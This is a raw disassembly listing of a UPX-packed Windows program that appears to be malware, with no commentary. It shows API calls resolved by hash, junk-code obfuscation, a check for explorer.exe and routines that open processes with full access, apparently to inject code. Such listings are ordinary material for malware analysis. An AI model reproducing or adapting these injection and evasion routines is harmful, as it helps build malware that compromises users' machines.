loc_402A76: ; CODE XREF: sub_4027EE+284�j
add eax, 22h
add ecx, 22h
cmp eax, 71h
jl short loc_402A6C
sub edi, [ebp+var_10]
mov dword_405104, eax
add edi, [ebp+arg_0]
cmp [ebp+arg_8], ebx
jnz short loc_402AE6
push 0E61874B3h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push edi
push ebx
push ebx
push [ebp+arg_4]
call eax
push 723EB0D5h
push 1
mov edi, eax
call sub_401117
pop ecx
pop ecx
push edi
call eax
cmp dword_405104, 0Ch
mov bl, 1
jl short loc_402ACE
inc dword_405104
loc_402ACE: ; CODE XREF: sub_4027EE+2D8�j
cmp dword_405104, 9Ah
jle short loc_402B2C
mov dword_405104, 17h
jmp short loc_402B2C
; ---------------------------------------------------------------------------
loc_402AE6: ; CODE XREF: sub_4027EE+2A1�j
push 0AA1DE02Fh
push 1
mov [ebp+var_30C], 10002h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_30C]
push ecx
push [ebp+arg_8]
call eax
push 0AA1DC82Fh
push 1
mov [ebp+var_25C], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_30C]
push ecx
push [ebp+arg_8]
call eax
mov bl, 1
loc_402B2C: ; CODE XREF: sub_4027EE+2EA�j
; sub_4027EE+2F6�j
push 77CD9567h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402B3D: ; CODE XREF: sub_4027EE+D8�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_4]
call eax
cmp dword_405104, 69h
jge short loc_402B5F
inc dword_405104
loc_402B5F: ; CODE XREF: sub_4027EE+369�j
mov al, bl
loc_402B61: ; CODE XREF: sub_4027EE+B6�j
pop edi
pop esi
pop ebx
leave
retn
sub_4027EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B66 proc near ; DATA XREF: sub_402CF4+138�o
; sub_402CF4+2E7�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push esi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
call sub_401117
pop ecx
pop ecx
push 7D0h
call eax
cmp dword_405104, 19h
jge short loc_402B97
inc dword_405104
loc_402B97: ; CODE XREF: sub_402B66+29�j
push edi
push 6FB89AF0h
xor esi, esi
push ebx
mov [ebp+var_4], esi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
push esi
push offset sub_402771
push esi
push esi
call eax
push 723EB0D5h
push ebx
mov edi, eax
call sub_401117
pop ecx
pop ecx
push edi
call eax
cmp dword_405104, 13h
jl short loc_402BDA
inc dword_405104
loc_402BDA: ; CODE XREF: sub_402B66+6C�j
cmp dword_405104, 0B1h
jle short loc_402BF0
mov dword_405104, 18h
loc_402BF0: ; CODE XREF: sub_402B66+7E�j
push 49A1374Ah
push ebx
call sub_401117
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
push 0Ch
mov edi, offset dword_405208
push edi
push offset dword_404228
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_14C]
push eax
call dword_40400C ; lstrcat
push 40h
lea eax, [ebp+var_44]
push esi
push eax
mov [ebp+var_48], 44h
call sub_4010BB
add esp, 0Ch
cmp dword_405104, 8Eh
mov [ebp+var_1C], ebx
mov [ebp+var_18], 5
jge short loc_402C5F
inc dword_405104
loc_402C5F: ; CODE XREF: sub_402B66+F1�j
push 46318AC7h
push ebx
call sub_401117
pop ecx
pop ecx
push offset dword_40540C
lea ecx, [ebp+var_48]
push ecx
push esi
push esi
push 4
push esi
push esi
push esi
lea ecx, [ebp+var_14C]
push ecx
push esi
call eax
push dword_405410
push dword_40540C
push offset sub_401E48
call sub_4027EE
add esp, 0Ch
test al, al
jz short loc_402CB9
mov edi, dword_405410
push 7B88BF3Bh
push ebx
call sub_401117
pop ecx
pop ecx
push edi
call eax
loc_402CB9: ; CODE XREF: sub_402B66+13B�j
push 52h
pop eax
push 3Fh
pop ecx
pop edi
loc_402CC0: ; CODE XREF: sub_402B66+16F�j
cmp ecx, 0CEh
ja short loc_402CCA
inc eax
inc ecx
loc_402CCA: ; CODE XREF: sub_402B66+160�j
add eax, 13h
add ecx, 13h
cmp eax, 95h
jl short loc_402CC0
push 768AA260h
push ebx
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_402B66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CF4 proc near ; CODE XREF: start+1BC�j
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_38 = byte ptr -38h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_13C]
push edi
mov [ebp+var_4], eax
call sub_401330
xor ebx, ebx
test al, al
jz loc_40301D
cmp dword_405104, 0ECh
jge short loc_402D2A
inc dword_405104
loc_402D2A: ; CODE XREF: sub_402CF4+2E�j
mov edi, 774393E8h
push edi
push 1
call sub_401117
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp+var_13C]
push ecx
push ebx
call eax
xor ecx, ecx
cmp eax, ebx
jz short loc_402D64
loc_402D4F: ; CODE XREF: sub_402CF4+6E�j
lea edx, [ebp+ecx+var_13B]
cmp byte ptr [edx-1], 5Ch
jnz short loc_402D5F
mov [ebp+var_4], edx
loc_402D5F: ; CODE XREF: sub_402CF4+66�j
inc ecx
cmp ecx, eax
jnz short loc_402D4F
loc_402D64: ; CODE XREF: sub_402CF4+59�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, 20202020h
or edx, eax
cmp edx, 6C707865h
jnz loc_402E73
mov edx, [ecx+4]
or edx, eax
cmp edx, 7265726Fh
jnz loc_402E73
mov ecx, [ecx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_402E73
mov eax, [ebp+arg_4]
dec eax
jnz loc_402E6C
push 8
pop ecx
push 0Ch
mov esi, offset dword_405208
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_404238
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_404000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_4014C4
mov esi, eax
cmp esi, ebx
pop ecx
jz loc_402E6C
cmp dword_405104, 0ECh
jge short loc_402DF8
inc dword_405104
loc_402DF8: ; CODE XREF: sub_402CF4+FC�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_402E6C
mov eax, dword_405104
add eax, 0FFFFFF9Fh
cmp eax, 95h
ja short loc_402E2A
inc dword_405104
loc_402E2A: ; CODE XREF: sub_402CF4+12E�j
push ebx
push esi
push offset sub_402B66
call sub_4027EE
add esp, 0Ch
push 30h
pop eax
push 0Ch
pop ecx
loc_402E3F: ; CODE XREF: sub_402CF4+160�j
cmp ecx, 0D3h
ja short loc_402E49
inc eax
inc ecx
loc_402E49: ; CODE XREF: sub_402CF4+151�j
add eax, 12h
add ecx, 12h
cmp eax, 94h
jl short loc_402E3F
push 723EB0D5h
push 1
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402E6C: ; CODE XREF: sub_402CF4+AE�j
; sub_402CF4+EC�j ...
xor eax, eax
jmp loc_403048
; ---------------------------------------------------------------------------
loc_402E73: ; CODE XREF: sub_402CF4+82�j
; sub_402CF4+93�j ...
push edi
xor edi, edi
inc edi
push edi
call sub_401117
pop ecx
pop ecx
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push ebx
call eax
push 0D89AD05h
push edi
call sub_401117
pop ecx
pop ecx
call eax
push 80DBBE07h
push 6
mov esi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+arg_4]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_405208
jz loc_402F5C
push 10h
push esi
push offset dword_4041F4
call sub_40102E
push 1B3D12B9h
push 6
call sub_401117
add esp, 14h
lea ecx, [ebp+var_8]
push ecx
push esi
push ebx
call eax
test eax, eax
jz short loc_402F5C
cmp dword_405104, 55h
jge short loc_402EF4
inc dword_405104
loc_402EF4: ; CODE XREF: sub_402CF4+1F8�j
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
push 7A2167DCh
mov [ebp+var_18], edi
mov edi, [ebp+arg_4]
push 6
mov [ebp+var_10], eax
mov [ebp+var_C], 2
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_18]
push ecx
push ebx
push edi
call eax
mov edi, [ebp+arg_4]
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push edi
call eax
push 4Eh
pop eax
push 26h
pop ecx
loc_402F40: ; CODE XREF: sub_402CF4+261�j
cmp ecx, 0B2h
ja short loc_402F4A
inc eax
inc ecx
loc_402F4A: ; CODE XREF: sub_402CF4+252�j
add eax, 13h
add ecx, 13h
cmp eax, 0AAh
jl short loc_402F40
mov dword_405104, eax
loc_402F5C: ; CODE XREF: sub_402CF4+1C3�j
; sub_402CF4+1EF�j
push 8
pop ecx
push 0Ch
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_404238
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_404000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_4014C4
mov esi, eax
cmp esi, ebx
pop ecx
jz loc_403022
cmp dword_405104, 0ECh
jge short loc_402FA7
inc dword_405104
loc_402FA7: ; CODE XREF: sub_402CF4+2AB�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_403022
mov eax, dword_405104
add eax, 0FFFFFF9Fh
cmp eax, 95h
ja short loc_402FD9
inc dword_405104
loc_402FD9: ; CODE XREF: sub_402CF4+2DD�j
push ebx
push esi
push offset sub_402B66
call sub_4027EE
add esp, 0Ch
push 30h
pop eax
push 0Ch
pop ecx
loc_402FEE: ; CODE XREF: sub_402CF4+30F�j
cmp ecx, 0D3h
ja short loc_402FF8
inc eax
inc ecx
loc_402FF8: ; CODE XREF: sub_402CF4+300�j
add eax, 12h
add ecx, 12h
cmp eax, 94h
jl short loc_402FEE
push 723EB0D5h
push 1
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
jmp short loc_403022
; ---------------------------------------------------------------------------
loc_40301D: ; CODE XREF: sub_402CF4+1E�j
call sub_401E48
loc_403022: ; CODE XREF: sub_402CF4+29B�j
; sub_402CF4+2CE�j ...
mov eax, dword_405104
add eax, 0FFFFFFB0h
cmp eax, 9Ah
ja short loc_403037
inc dword_405104
loc_403037: ; CODE XREF: sub_402CF4+33B�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
loc_403048: ; CODE XREF: sub_402CF4+17A�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_402CF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403050 proc near ; CODE XREF: sub_4014C4+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_403064: ; CODE XREF: sub_403050+29�j
cmp ecx, eax
jb short loc_403072
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_403072: ; CODE XREF: sub_403050+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_403064
sub_403050 endp
; ---------------------------------------------------------------------------
align 4
dd 3E1h dup(0)
dword_404000 dd 77E73167h ; DATA XREF: sub_4014C4+337�r
; sub_401879+CD�r ...
dword_404004 dd 77E76A2Eh ; DATA XREF: sub_4014C4+260�r
; sub_4014C4+2DE�r ...
dword_404008 dd 77E74672h ; DATA XREF: sub_4014C4+190�r
; sub_4014C4+226�r
dword_40400C dd 77E74155h ; DATA XREF: sub_4014C4+355�r
; sub_401879+80�r ...
dd 0
dword_404014 dd 77D4C96Ah ; DATA XREF: sub_401E48+10F�r
; sub_401E48+6F3�r ...
dd 0
dword_40401C dd 35112549h, 3C4C4835h, 353515h ; DATA XREF: sub_401117+AB�o
dword_404028 dd 31354D51h, 153C3D39h, 3535h ; DATA XREF: sub_401117+9C�o
dword_404034 dd 213D2159h, 3C55113Dh, 353515h ; DATA XREF: sub_401117+8D�o
; sub_401E48+16�o
dword_404040 dd 45014945h, 35153C21h, 35h ; DATA XREF: sub_401117+7E�o
dword_40404C dd 15D1501h, 4C482145h, 3535153Ch, 0 ; DATA XREF: sub_401117+6F�o
dword_40405C dd 494D115Dh, 3C3D3921h, 353515h ; DATA XREF: sub_401117+49�o
dword_404068 dd 7Dh ; DATA XREF: sub_4014C4+340�o
dword_40406C dd 25095D49h, 3C554939h, 116511h ; DATA XREF: sub_4014C4+29D�o
dword_404078 dd 4C4D115Dh, 44h ; DATA XREF: sub_401879+6B�o
dword_404080 dd 7015211Ch, 0 ; DATA XREF: sub_401E48+89E�o
dword_404088 dd 1539091Ch, 704C11h ; DATA XREF: sub_401E48+798�o
dword_404090 dd 5110h ; DATA XREF: sub_401E48+6DE�o
dword_404094 dd 351D150Dh, 25453C11h, 15017845h, 1501705Dh, 5048585Dh
; DATA XREF: sub_401E48+6B0�o
dd 1539091Ch, 704011h
dword_4040B0 dd 41652119h, 11351D59h, 29h ; DATA XREF: sub_401E48+629�o
dword_4040BC dd 392D1521h, 25453C51h, 45h ; DATA XREF: sub_401E48+59C�o
dword_4040C8 dd 294D093Dh, 351D0115h, 25453C4Dh, 45h ; DATA XREF: sub_401E48+50F�o
dword_4040D8 dd 41295D55h, 453C1D2Dh, 4525h ; DATA XREF: sub_401E48+4A7�o
dword_4040E4 dd 13D5129h, 25453C21h, 45h ; DATA XREF: sub_401E48+42A�o
dword_4040F0 dd 21492521h, 3C5D193Dh, 452545h ; DATA XREF: sub_401E48+3B0�o
dword_4040FC dd 553D0931h, 394931h ; DATA XREF: sub_401E48+335�o
dword_404104 dd 6C09h ; DATA XREF: sub_401E48+306�o
; sub_401E48+403�o ...
dword_404108 dd 612D295Dh, 15291135h, 453C092Dh, 1784525h, 1705D15h
; DATA XREF: sub_401E48+2AD�o
dd 48585D15h, 50h
dword_404124 dd 0F56C09h ; DATA XREF: sub_401E48+280�o
; sub_401E48+674�o
dword_404128 dd 45555525h, 6138386Ch, 45193D19h, 1155155h, 210D3C21h
; DATA XREF: sub_401E48+204�o
dd 4D45386Dh, 38491939h, 19115921h, 6D51116Dh, 385D49h
dword_404150 dd 45555525h, 5938386Ch, 14D4D19h, 55394121h, 29253C25h
; DATA XREF: sub_401E48+1EC�o
dd 394D4538h, 21384919h, 6D191159h, 496D5111h, 385Dh
dword_404178 dd 513D45F5h, 65113C29h, 11h ; DATA XREF: sub_401E48+1C0�o
dword_404184 dd 192915F5h, 3C01394Dh, 116511h ; DATA XREF: sub_401E48+1A9�o
dword_404190 dd 212D01F5h, 5935613Dh, 65113C21h, 11h ; DATA XREF: sub_401E48+192�o
dword_4041A0 dd 591D3DF5h, 3C012151h, 116511h ; DATA XREF: sub_401E48+17B�o
dword_4041AC dd 456129F5h, 113C6155h, 1165h ; DATA XREF: sub_401E48+164�o
dword_4041B8 dd 0D5145F5h, 65113C59h, 11h ; DATA XREF: sub_401E48+14D�o
dword_4041C4 dd 11192DF5h, 3C654555h, 116511h ; DATA XREF: sub_401E48+130�o
dword_4041D0 dd 1510h ; DATA XREF: sub_401E48+FD�o
dword_4041D4 dd 0F56C89h ; DATA XREF: sub_401E48+D5�o
dword_4041D8 dd 3D4D1129h, 4C483511h, 3535153Ch, 0 ; DATA XREF: sub_401E48+52�o
dword_4041E8 dd 4D114951h, 153C4C48h, 3535h ; DATA XREF: sub_401E48+38�o
dword_4041F4 dd 119511C9h, 0C519510Dh, 215D214Dh, 11191135h, 0
; DATA XREF: sub_402CF4+1CC�o
dword_404208 dd 3515553Dh, 35153C35h, 35h ; DATA XREF: sub_4027EE+126�o
dword_404214 dd 1B155BDh, 1121DD45h, 0C91DB959h, 21550911h, 3D39h
; DATA XREF: sub_4027EE+E6�o
dword_404228 dd 95D49F5h, 55493925h, 1165113Ch, 0 ; DATA XREF: sub_402B66+AD�o
dword_404238 dd 35456511h, 4D114D39h, 1165113Ch, 36Fh dup(0) ; DATA XREF: sub_402CF4+C4�o
; sub_402CF4+273�o
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402771+34�o
; sub_402CF4+18C�o
align 4
dd 3Ah dup(0)
dword_405104 dd 0ADh ; DATA XREF: sub_401117+5�r
; sub_401117+18�w ...
dword_405108 dd 40h dup(0) ; DATA XREF: sub_401879+C0�o
; sub_401E48+1FA�o
dword_405208 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_401117+43�o
; sub_401117+69�o ...
dword_405308 dd 40h dup(0) ; DATA XREF: sub_401879:loc_401940�o
; sub_401879:loc_40195E�o ...
byte_405408 db 1 ; DATA XREF: sub_401330+28�r
; sub_401330+84�w
byte_405409 db 1 ; DATA XREF: sub_401330:loc_40134F�r
; sub_401330+32�w
align 4
dword_40540C dd 0 ; DATA XREF: sub_402B66+106�o
; sub_402B66+126�r
dword_405410 dd 0 ; DATA XREF: sub_402B66+120�r
; sub_402B66+13D�r
dd 6FBh dup(0)
UPX0 ends
; Section 2. (virtual address 00007000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00007000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 407000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_407000 dd 58h, 3000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: start+1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 30140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 21F00000h, 62A1401h, 6090620h, 6090609h, 0F320609h
dd 1A36140Fh, 3E191A21h, 806172Bh, 2B0D130Bh, 100B0806h
dd 15370E44h, 23104E0Eh, 6093110h, 84571A0Ch, 6093105h
dd 0A063F0Ch, 150C0609h, 173D053Ch, 1608142Eh, 20130C49h
dd 516063Ch, 7072C0Eh, 10070710h, 3268100Ch, 230C0609h
dd 3E0C060Fh, 17132A10h, 6E17240Ch, 0C06092Ch, 0C06095Dh
dd 16103851h, 500D2414h, 62B1039h, 14171A22h, 60F1516h
dd 13280C0Ch, 0B081305h, 17171712h, 10141717h, 0E0A0E08h
dd 0C060908h, 18081033h, 6093215h, 3E2F0C0Ch, 1E100609h
dd 27080E3Dh, 2708103Eh, 93F2741h, 270C0C06h, 0C06093Fh
dd 244B270Ch, 162E0810h, 0E190925h, 310C060Ch, 0C06092Ch
dd 100C0D1Dh, 19371910h, 203B0C25h, 180C0609h, 80E1B62h
dd 806092Ah, 6130655h, 0C0C0609h, 0C060C34h, 3219123Bh
dd 0B3A6125h, 9760C06h, 1C1E092Fh, 260C0609h, 151C1606h
dd 5061B12h, 0C3C3912h, 1A150B88h, 710220Ch, 0E322331h
dd 10680926h, 220C1A15h, 16310710h, 45500010h, 14C0000h
dd 0F1070004h, 46ACh, 0
dd 0E00000h, 10B0102h, 22000008h, 0E000000h, 0
dd 2CF40000h, 10000000h, 40000000h, 0
dd 10000040h, 2000000h, 40000h, 0
dd 40000h, 0
dd 70000000h, 4000000h, 0
dd 20000h, 400h, 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 42480000h, 3C0000h, 6 dup(0)
dd 60000000h, 2880000h, 0Ch dup(0)
dd 40000000h, 1C0000h, 6 dup(0)
dd 742E0000h, 747865h, 207B0000h, 10000000h, 22000000h
dd 4000000h, 3 dup(0)
dd 200000h, 722E6000h, 61746164h, 2F60000h, 40000000h
dd 4000000h, 26000000h, 3 dup(0)
dd 400000h, 642E4000h, 617461h, 41C0000h, 50000000h, 5 dup(0)
dd 400000h, 722EC000h, 636F6C65h, 2D00000h, 60000000h
dd 4000000h, 2A000000h, 3 dup(0)
dd 400000h, 60004200h, 42A00000h, 604A0000h, 82000000h
dd 61h, 299DBEDEh, 0FEB599A4h, 5F7A5EDFh, 5757084Bh, 85D88B5Dh
dd 683D74DBh, 0FDC94385h, 0C3F95830h, 0FC4D8D19h, 0AF535351h
dd 0C327FB0Eh, 0FC75F8B5h, 6FA84268h, 6C56299Eh, 26EC285Ch
dd 59FE6BEBh, 742959CCh, 272F7DACh, 3D2A2AFEh, 6CECE887h
dd 7BAC72E9h, 6A7159h, 8EC68172h, 3613BB00h, 56D88BE4h
dd 6857FF6Ah, 37FB23D5h, 723EB0ECh, 8B036711h, 0BB14085Dh
dd 970B08F6h, 18B8005Bh, 20164513h, 3C80FC4Ch, 3DF90908h
dd 93E868DFh, 42E67743h, 0BF5924ACh, 2FFCE85Eh, 906B2784h
dd 8F3DB8E8h, 239B683Ch, 90F849DBh, 56A8AC4h, 3951F415h
dd 0B94EC10h, 99808A5h, 0C2031E57h, 9627B059h, 0DE397C0Ch
dd 0FEEFDC9Eh, 0ED140330h, 73F445F7h, 0E8860FFFh, 0B69DBEFFh
dd 0BDBF1002h, 9C8DFCD2h, 338B4F9Dh, 764CF685h, 0BDA60B96h
dd 56AC6802h, 0DEED2D2h, 4106868h, 5F6AA700h, 186CF8DDh
dd 59CD24CBh, 0C32F2FEFh, 2C423C76h, 858D70D7h, 5056C2E8h
dd 49DB3FBh, 5BF875A0h, 9F16C94Eh, 0B5B6D218h, 3239011Ah
dd 7FCCF005h, 20B59DC1h, 0E52429CFh, 219168F0h, 66B1E4FBh
dd 30277842h, 2F2A56FEh, 6ADB3493h, 0E13D874Fh, 0BF3D0F0Fh
dd 23AEB01Eh, 892358Bh, 0D6FF5088h, 0FBB9B6B1h, 8045CD5Bh
dd 0F3AE9BDh, 21C80C0Fh, 5CEA9A5Ch, 0F4501B3h, 5C80CCC9h
dd 344F26B6h, 8BFF7FDBh, 4E01EBF0h, 0E35BC80h, 6AF5755Ch
dd 0DD0E8F13h, 932B7DACh, 79F80214h, 8AAFEB7Ch, 0F7B76721h
dd 779515FFh, 0D694D7Eh, 720333BBh, 8D36259Bh, 0BBAC3584h
dd 50EC6ECCh, 85C10439h, 848B240Bh, 875D879Ah, 8FEB285h
dd 0C12C0970h, 49979102h, 9F3D1515h, 0F620CFA3h, 6C9E57C0h
dd 0F7070580h, 0F2185C74h, 76A8A94h, 4F51E87Bh, 0B3999BFEh
dd 0E4A98587h, 0FB7DEBFCh, 842F7591h, 94571B8Dh, 33FF7A74h
dd 0B6CD244Dh, 35BF03B4h, 84D2891Ch, 0CBD65B37h, 0C53D2424h
dd 635851DFh, 0FDC871ACh, 68A26800h, 0B03FD62Ah, 1D572AE6h
dd 0E9ED680Ch, 459220E4h, 1A02F65Ah, 0B038DB0h, 181D9231h
dd 137EF41Dh, 0C146DBDCh, 0F0539E0h, 5E2E1D82h, 9921A430h
dd 0AB4EBB2h, 402E548Ch, 537D0878h, 0EA56FEFCh, 3DDAAEDEh
dd 128925C9h, 45C7EC02h, 5307D0E0h, 8D92D283h, 0FF03EC8Ch
dd 5646E593h, 53F788D8h, 34D48168h, 89036A05h, 0C216F5E3h
dd 224EE875h, 6407BFC0h, 0DF63522Ch, 0DBF78878h, 0FA24A418h
dd 6A6A299Ch, 0DB7C92Eh, 0FB66F87Ch, 67DBBA34h, 145D38EEh
dd 2A741565h, 7752139h, 663D4154h, 5B82DBBh, 4C084306h
dd 9D906D32h, 0EB5C22ECh, 3E11D23h, 0F8B9EBF9h, 0C7AFFE5Dh
dd 8559B63Dh, 5CD7A502h, 0EBE9282Bh, 2E661Fh, 0BD6675D7h
dd 0A57B87Dh, 6C2E74ABh, 0B9FB1CF0h, 96692626h, 0AF42CA5h
dd 0C0841BB7h, 3D1B5E4Fh, 0D09C789Ch, 62CD981Ah, 857D6CBh
dd 1D3D02E0h, 84C8A4E4h, 7350618h, 2E406660h, 93D1CA4h
dd 50C80C3h, 678FD910h, 0FC6C2E40h, 7D19E443h, 27F6483Dh
dd 0F92F5CE0h, 7368A78Ch, 1FD1B3DBh, 0ECF46220h, 0DFEEFFEDh
dd 71BE1279h, 0F148FDEh, 46018187h, 0D3D23DF0h, 1403F193h
dd 9F08F8F1h, 40806853h, 0DA15B2CAh, 4B96E853h, 0E3360C40h
dd 0E42916C1h, 0B53DCB39h, 59C73C7Ch, 0C20418CAh, 0B25F0858h
dd 62B40327h, 0A8ED2129h, 2FBD3656h, 0DA78709h, 0C095B823h
dd 16266DCCh, 0A91EAC7Ch, 0A23A6291h, 3BD740B4h, 0D4C3060Bh
dd 785FB2DBh, 68128B28h, 0F3FD1C3h, 95DC4CAAh, 51C932B2h
dd 928DE457h, 0AE36E72Eh, 0B18BF26Ah, 5623E2F7h, 19196596h
dd 63439C76h, 0E7426C21h, 70399CA2h, 416B60E6h, 0E0977199h
dd 0C80CC905h, 15D39D85h, 70EDBEF3h, 0EBA89B23h, 3DFE7913h
dd 84D903FEh, 985EFDBh, 0EB105D88h, 2874DA04h, 390B7B1Eh
dd 0D4774789h, 0B0D8083Fh, 68AE921Fh, 7314FB0Ch, 0F1B3404Ch
dd 0F911B211h, 63E3F635h, 804932F2h, 8B3D1C1Ch, 818CD60Ch
dd 41110F30h, 8D9E47EDh, 68800112h, 0AEF7CBF1h, 7181F110h
dd 24F88BD8h, 3DFC2657h, 8425CCF0h, 280C6081h, 0A8EA3625h
dd 0F6980040h, 78D4EB18h, 0C28B4063h, 2E44D3Bh, 2A975B02h
dd 97D828Dh, 51EA104Fh, 96C30581h, 0D11A90Ah, 9320307Ch
dd 821B110h, 0AB3DF741h, 0E555320h, 0CE843741h, 0E92FDB34h
dd 7700C181h, 0F7326A7Dh, 8367CD08h, 1313932Ch, 48D5C6Ah
dd 45C6ADCCh, 88733C8Ch, 69663D44h, 8AC7FD59h, 678F4631h
dd 588646CCh, 378881h, 2EED0109h, 3DDD5F60h, 1C1F3D3h
dd 78900575h, 0A056C721h, 83958308h, 8172FFC8h, 0ADCE1D1Bh
dd 0B4D08824h, 9581C802h, 34FD39A1h, 0CE05E012h, 4357E4BFh
dd 23610053h, 21A3D6BFh, 1957E831h, 323256A4h, 217DD80Ch
dd 0EC18CC6Ch, 61706BF3h, 0A35B2CDCh, 0E9F715EAh, 58547D89h
dd 6887F787h, 7A813811h, 6186A03Fh, 0A752C2Dh, 74D2C0CAh
dd 42358C86h, 8216E572h, 0FB26E0D4h, 0DE97B649h, 578667ECh
dd 5F632200h, 51542BBBh, 2702AA05h, 170270D0h, 68543716h
dd 14E25634h, 836F0808h, 1832F43Fh, 3D42E33Dh, 1E563238h
dd 3D8BC432h, 0B6F6321Dh, 3956D135h, 6AD738C4h, 90B81C09h
dd 162CE791h, 6AC0AD4h, 0E41BE464h, 0F4A00B2Dh, 79190192h
dd 0B004900Dh, 84E406CBh, 16787214h, 19983D81h, 3DFBBE24h
dd 2245BBE6h, 2B26D8C9h, 7320850h, 2743D632h, 87432817h
dd 54CE42E4h, 8166A713h, 0F1B8CE87h, 419747Dh, 9C06C5DAh
dd 0B1AF0A90h, 0CB8B3D5h, 74BC2C03h, 40EC0A6Ah, 0C004EC1Eh
dd 3DD79359h, 0F1BF03A2h, 2464BD08h, 0D723C485h, 0FB11D8Bh
dd 926A386Bh, 6AD31250h, 14AD2C19h, 0FD089039h, 7E58650Ch
dd 132660B3h, 107508E4h, 30263019h, 2330B3FBh, 0EC643677h
dd 4A045802h, 87655856h, 0C2DE3D4Bh, 87C97B75h, 0CF902640h
dd 1FC3007h, 18D7AD10h, 3F8AB101h, 0D520C85Dh, 62F7004h
dd 56732EB0h, 8E0F87DEh, 1B97026Eh, 0B2E46439h, 5B4314C7h
dd 90F00B7Ah, 3588D097h, 4B1E776Bh, 82FC5918h, 9192B479h
dd 0E40979CBh, 0B66D6003h, 80257039h, 0A990D87Ah, 0CF3DC26Ch
dd 96147CFFh, 0A191922h, 0C8C67D8h, 0DE441C8h, 480C03C8h
dd 70905091h, 6E978C06h, 65437124h, 0BCF43253h, 325028Ch
dd 22E82172h, 0C94C915h, 3242B024h, 0DF48A51Dh, 8C1EF39Eh
dd 2FEDB484h, 0AFC13DD1h, 1B40EC64h, 0E2689486h, 0EACBE046h
dd 0EF270118h, 0E051444Dh, 883781BFh, 57902DEDh, 4C453A2Eh
dd 7037E350h, 8A68643Bh, 0E01D040Ah, 2B697D80h, 8D06FB71h
dd 6756145h, 1A3063A6h, 5B09E316h, 0FF4696Bh, 7D6B3D63h
dd 933497A9h, 6C4E462Dh, 0C16C26Ch, 0A01704CCh, 7F706039h
dd 0F1172031h, 6D7DAB1Dh, 8F2DB000h, 6D626B7Ch, 4E621904h
dd 0DD64D960h, 64183B86h, 0E7886200h, 4C806091h, 130816D3h
dd 180F90A6h, 932D07E8h, 8B6617B5h, 597EBF0Bh, 87B7F841h
